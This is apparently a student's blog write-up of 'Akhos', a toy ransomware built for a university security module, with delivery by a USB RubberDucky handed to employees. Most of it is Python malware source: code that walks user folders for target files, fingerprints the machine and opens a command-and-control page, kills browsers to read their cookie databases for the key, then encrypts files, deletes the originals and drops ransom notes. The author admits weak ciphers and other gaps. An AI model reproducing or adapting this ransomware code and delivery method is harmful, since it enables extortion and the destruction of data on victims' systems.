Ahkos is the name given to a toy ransomware that I built for a Cyber Security module during my undergraduate degree. The word comes from ancient Greece, ἄχος, and means to be upset or afraid, which is what most people feel when they are dealing with these sorts of malware.
Akhos is comprised of three parts; Python, compiled into an executable to find and encrypt the files, Ruby running Sinatra backed by PostgreSQL to provides the web-based Command and Control, and a RubberDucky that provides the delivery mechanism.
A RubberDucky will be used to deliver the payload to the target organisation. For those unaware, a RubberDucky is a small device that looks like a USB flash drive but acts like a USB keyboard. It exploits the trust relationship that modern systems have with peripheral devices that are plugged in via USB. Using a special language called DuckyScript, the developer can send a sequence of keyboard strokes to the computer when the device is plugged in, allowing them to execute arbitrary commands. How this USB gets into the hands of an employee at the target company can be achieved in many ways; dead drops, mail, free hand-outs at conferences, plugged in during office tours, etc.
The reason behind this choice is due to a conference talk that was presented at UKFast, Manchester, in 2014. At that conference, there was a talk about social engineering from a well renowned security professional: Andy Hague. During this talk he outlined an experiment that he performed in which he sent out USB Flash Drives packaged in a golden box to the Chief Financial Officer (CFO) at 500 different companies. He sent these out on Friday evening so they would be waiting on the desk of the CFO the following Monday morning as they arrived at work. Inside the golden box was a elegantly written note inviting the CFO to a company event and informing them to respond via the USB provided. Upon inserting this USB into their computer, a full screen picture would appear with a message informing them of the experiment. Behind the scenes that USB pinged his server to show him how many of the devices were plugged in. By noon that Monday he had over 350 out of the 500 USBs ping his server; 70% success rate within 3 hours of the working week beginning.
When the RubberDucky is plugged in, the embedded firmware will automatically run a script located on the inserted microSD card, and that script is configured by the attacker to run whatever commands they need to fulfil their objectives. In this case, a binary called RSVP.exe is executed. Let's have a look at what happens when it is run:
After initial setup of logging and configuration variables, two threads are spawned to run concurrently. The first of these is the DirectoryThread. The sole purpose of this thread is to walk the filesystem and gather a list of files to encrypt.
from threading import Thread
import os
from queue import Queue
from pathlib import Path
from re import match
class DirectoryThread(Thread):
'''
This thread is responsibile for locating and building a list of files that are going to
be encrypted. It recursively traverses the folders and returns a list via the queue.
'''
def __init__(self, queue: Queue, admin: bool = False):
Thread.__init__(self)
self.queue = queue
# The whitelist has been hardcoded for simplicity, but in reality the patterns are
# stored in a YAML file and loaded during startup.
self.whitelist = ['.*.akhos_target']
self.admin = admin
def run(self):
files = self.collect_filelist()
self.queue.put(files)
#abstractmethod
def collect_filelist(self):
raise NotImplementedError
@staticmethod
def directory_thread_from_os(os: str, queue: Queue, admin: bool = False):
if os == 'linux':
return LinuxDirectoryThread(queue, admin)
if os == 'windows':
return WindowsDirectoryThread(queue, admin)
class LinuxDirectoryThread(DirectoryThread):
#override
def collect_filelist(self):
directory_array = []
root = '/' if self.admin else '/home/'
for dirname, dirnames, filenames in os.walk(root):
for filename in filenames:
for pattern in self.whitelist:
if match(pattern, Path(filename).suffix):
directory_array.append(Path(dirname, filename))
return directory_array
class WindowsDirectoryThread(DirectoryThread):
#override
def collect_filelist(self):
directory_array = []
root = 'C:/' if self.admin else 'C:/Users/'
for dirname, dirnames, filenames in os.walk(root):
for filename in filenames:
for pattern in self.whitelist:
if match(pattern, Path(filename).suffix):
directory_array.append(Path(dirname, filename))
return directory_array
At the same time, there is a another thread spawned called BrowserThread. The purposes of this thread is to determine the name of the browser that is installed and open a page to the Command and Control URL (for example): https://command_and_control.akhos.server. It gathers some information to create a MD5 hash that can be used to uniquely identify the system, then appends the hash to the URL as the target path: https://command_and_control.akhos.server/1a79a4d60de6718e8e5b326e338ae533
import webbrowser
from threading import Thread
from hashlib import md5
from getpass import getuser
from platform import platform
from socket import gethostname
from time import time_ns
from queue import Queue
class BrowserThread(Thread):
'''
This thread is responsible for determining the initial connection to the C&C server. It first
creates an MD5 hexdigest of some system information to pass on. Second it needs to open a
webpage and pass on which application opened it.
'''
def __init__(self, queue: Queue, cc_url: str):
Thread.__init__(self)
self.queue = queue
self.cc_url = cc_url
def run(self) -> bool:
uid = self.generate_uid()
browser = self.find_usable_browser()
if not browser:
return False
browser.open_new_tab(f'{self.cc_url}/{uid}')
browser_name = self.normalise_browser_name(self.get_browser_name(browser))
if not browser_name:
return False
self.queue.put(browser_name)
return True
def generate_uid(self) -> str:
info = platform() + gethostname() + getuser() + str(time_ns())
return md5(info.encode('utf-8')).hexdigest()
def find_usable_browser(self):
for browser in self.browser_list():
try:
return webbrowser.get(browser)
except webbrowser.Error:
continue
return None
#abstractmethod
def browser_list(self) -> list:
raise NotImplementedError
#abstractmethod
def get_browser_name(self, browser) -> str:
raise NotImplementedError
def normalise_browser_name(self, browser_name: str) -> str:
if browser_name in ['google-chrome', 'chrome', 'chromium', 'chromium-browser']:
return 'chrome'
elif browser_name in ['mozilla', 'firefox']:
return 'firefox'
else:
return None
@staticmethod
def browser_thread_from_os(os, queue, cc_url):
if os == 'linux':
return LinuxBrowserThread(queue, cc_url)
if os == 'windows':
return WindowsBrowserThread(queue, cc_url)
class LinuxBrowserThread(BrowserThread):
def __init__(self, queue, cc_url):
super().__init__(queue, cc_url)
#override
def browser_list(self) -> list:
return ['firefox', 'google-chrome', 'chromium']
#override
def get_browser_name(self, browser):
return browser.basename
class WindowsBrowserThread(BrowserThread):
'''
Windows specific searching, The 'webbrowser' module has a browser type of 'windows-default',
which is likely to be chosen. It doesn't support the `basename` method, so the registry needs to
be queried to find out which browser is set to default if this option is chosen.
'''
def __init__(self, queue, cc_url):
super().__init__(queue, cc_url)
#override
def browser_list(self) -> list:
return ['firefox', 'mozilla', 'google-chrome', 'chrome', 'windows-default']
#override
def get_browser_name(self, browser) -> str:
if type(browser) == webbrowser.WindowsDefault:
from winreg import OpenKey, QueryValueEx, HKEY_CURRENT_USER
from re import search
def get_browser_name_from_registry_key(reg_path: str) -> str:
with OpenKey(HKEY_CURRENT_USER, reg_path) as key:
default = QueryValueEx(key, 'ProgId')[0].lower()
for element in self.browser_list():
if search(element, default):
return element
return None
path = r'Software\Microsoft\Windows\Shell\Associations\UrlAssociations\https\UserChoice'
browser_name = get_browser_name_from_registry_key(path)
if browser_name:
return browser_name
path = r'Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice'
browser_name = get_browser_name_from_registry_key(path)
return browser_name
else:
return browser.basename
The page displayed to the user when the browser opens will contain a form that resembles the one in the image to the bottom left. This is designed to keep the user distracted while the ransomware encrypts the files, and has a delayed reset trigger on the form once upon clicking "Submit". The other use for this page is to deliver the encryption key to the system, and that is done via a HTTP cookie. An example of this is shown on the bottom right. As you can see, the value is stored in the 'name' field. This is because cookie values are usually encrypted by the browser, but the name is not. The cookie also has a max age so that is it deleted.
Once the browser thread has returned the name of the browser and sent the user to the RSVP form, the next stage is to poll the browser cookie cache for the key. This is done in an object aptly named CookieRetriever.
import sqlite3
import glob
from time import sleep, time
from abc import abstractmethod, ABC
from os import system
class CookieRetriever(ABC):
'''
This object is responsible for retrieving the encryption key from the data store that
holds the browser cookies. It will continue until the timeout is reached, and return the
key, or None.
'''
def __init__(self, cc_url: str, os: str, timeout_sec: int):
self.cc_url = cc_url
self.os = os
self.timeout = timeout_sec
def run(self):
start_time = time()
timeout_exceeded = False
while not timeout_exceeded:
cookie = self.retrieve_cookie()
if cookie:
return cookie
sleep(5)
timeout_exceeded = (time() - self.timeout) > start_time
return None
@abstractmethod
def retrieve_cookie(self):
pass
@staticmethod
def cookie_retriever_from_browser_name(browser: str, cc_url: str, os: str, timeout_sec: int):
if browser == 'firefox':
return FirefoxSqliteCookieRetriever(cc_url, os, timeout_sec)
if browser == 'chrome':
return GoogleChromeSqliteCookieRetriever(cc_url, os, timeout_sec)
if browser == 'opera':
return OperaSqliteCookieRetriever(cc_url, os, timeout_sec)
if browser == 'edge':
return EdgeSqliteCookieRetriever(cc_url, timeout_sec)
raise NotImplementedError(f'Invalid browser name: {browser}')
class SqliteCookieRetriever(CookieRetriever):
'''
This object is responsible for connecting to the SQLite3 database that holds the browser cookies
and retrieving the encryption key. It will continue until the timeout is reached, and return
even if it cannot locate the cookie. Timers have been placed to slow down database connections,
otherwise it would eventually overwhelm with SQL queries.
'''
database_path = None
table_name = None
column_name = None
def __init__(self, cc_url: str, os: str, timeout_sec: int):
super().__init__(cc_url, os, timeout_sec)
self.connect_to_database()
def connect_to_database(self):
path = glob.glob(self.database_path[self.os])[0]
try:
self.database = sqlite3.connect(path)
self.database.execute('SELECT COUNT(*) FROM sqlite_master;')
except sqlite3.OperationalError as e:
# Databases are often locked if the browser is open and using them. Kill the browser. :)
if self.os == 'linux':
system(f'killall -9 {self.browser_name["linux"]}')
elif self.os == 'windows':
system(f'taskkill /f /im {self.browser_name["windows"]}')
self.connect_to_database()
#override
def retrieve_cookie(self):
sql = f'SELECT name FROM {self.table_name} WHERE {self.column_name}=?'
cursor = self.database.execute(sql, [self.cc_url])
key = cursor.fetchone()
if key:
key = key[0]
self.database.close()
return key
class FirefoxSqliteCookieRetriever(SqliteCookieRetriever):
database_path = {
'linux': '/home/*/.mozilla/firefox/*/cookies.sqlite',
'windows': 'C:/Users/*/AppData/Roaming/Mozilla/Firefox/Profiles/*/cookies.sqlite'
}
browser_name = {
'linux': 'firefox',
'windows': 'firefox.exe'
}
table_name = 'moz_cookies'
column_name = 'host'
def __init__(self, cc_url: str, os: str, timeout_sec: int):
super().__init__(cc_url, os, timeout_sec)
# For sake of brevity, the other subclasses have not been included, but there is a concrete
# implementation for each supported brower.
With the key retrieved from the cookie, it must be split into the three components. This is because Akhos uses a "product cipher" for encryption. A product cipher is simply a pipeline of algorithms, where the output of one is the input to the next. Modern ciphers, such as the Advanced Encryption Standard (AES) use this approach. The following diagram depicts the flow that Akhos uses:
The three ciphers chosen for this are: Affine, transposition, and the Vigenere. Each has their own restrictions on the format of the key, so three keys are needed. These are all symmetric ciphers and use the same key for decrypting a ciphertext. To encrypt a plain text message P with this product cipher:
P will be substituted with the Affine cipher to generate the cipher text C1 . C1 will be permuted using transposition cipher to generate C2 . C2 will then be substituted using the Vigenere cipher to produce the final cipher text C3 . C = E3(E2(E1(P, Ka, Kb), K2), K3)
At this point in the execution, the directory thread should have returned with the list of files to encrypt. Now the main loop can run, passing each file into the product cipher and writing the output to a new file.
# Prior to this is the collection of the encryption key.
# Ensure directory list is finished, then retrieve list from the queue.
directory_thread.join()
file_list = queue.get()
# A new file will be created every 10th file.
counter = 0
for file_path in file_list:
# Open file and encrypt contents.
original_file_path = Path(file_path)
ciphertext = encryptor.encrypt(keys, original_file_path.read_text())
# Hash file name and append file extension.
hashed_file_name = md5(original_file_path.name.encode('utf-8')).hexdigest() + '.0wn3d'
# Write encrypted text to file.
out_file_path = Path(original_file_path.parent, hashed_file_name)
out_file_path.write_text(ciphertext)
# Every 10 files create new random file.
counter += 1
if counter % 10 == 0:
random_file_path = Path(f'{md5(str(counter).encode("utf-8")).hexdigest()}.0wn3d')
random_file_path.write_bytes(urandom(4096))
# Add payment instruction file to each directory.
ransom_file_path = Path(original_file_path.parent, 'ransom.txt')
if not ransom_file_path.exists():
ransom_file_path.write_text(ransome_text)
# Delete old file.
remove(original_file_path)
A new file is for every 10 files encrypted. This adds a level of obfuscation to the binary to make reverse engineering efforts a little more challenging. A standard ransom note is added to each directory with a link to an onion site, payment instructions, and the warning regarding missing payment.
Altogether, this makes a complete ransomware variant, although it has several obvious weaknesses. First and foremost is the use of weak and broken ciphers. In a real-world scenario, there would be no need to use anything other that AES or an equally powerful alternative, but this project was a lesson in cryptography as well as ransomware. The second, and equally obvious, flaw is that the Volume Shadow Service (VSS) was not deleted. VSS is a Windows backup tool that could be used to restore the encrypted files.